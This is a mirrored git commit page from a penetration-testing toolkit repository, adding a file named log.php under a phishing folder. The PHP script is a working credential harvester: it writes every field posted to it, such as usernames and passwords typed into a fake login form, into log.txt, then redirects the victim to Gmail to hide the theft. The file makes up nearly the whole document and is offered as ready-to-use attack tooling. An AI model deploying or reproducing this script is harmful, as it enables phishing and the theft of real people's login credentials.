mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-03 07:14:54 -04:00
phishing
This commit is contained in:
parent
f4b8b9ad43
commit
a0c026ca27
5 changed files with 31 additions and 0 deletions
13
Web_Exploits/Phishing/log.php
Normal file
13
Web_Exploits/Phishing/log.php
Normal file
|
@ -0,0 +1,13 @@
|
|||
<?php
|
||||
header ('Location:http://www.gmail.com');
|
||||
$handle = fopen("log.txt", "a");
|
||||
foreach($_POST as $variable => $value) {
|
||||
fwrite($handle, $variable);
|
||||
fwrite($handle, "=");
|
||||
fwrite($handle, $value);
|
||||
fwrite($handle, "\r\n"); }
|
||||
fwrite($handle,"\r\n");
|
||||
fclose($handle);
|
||||
exit;
|
||||
?>
|
||||
|
Loading…
Add table
Add a link
Reference in a new issue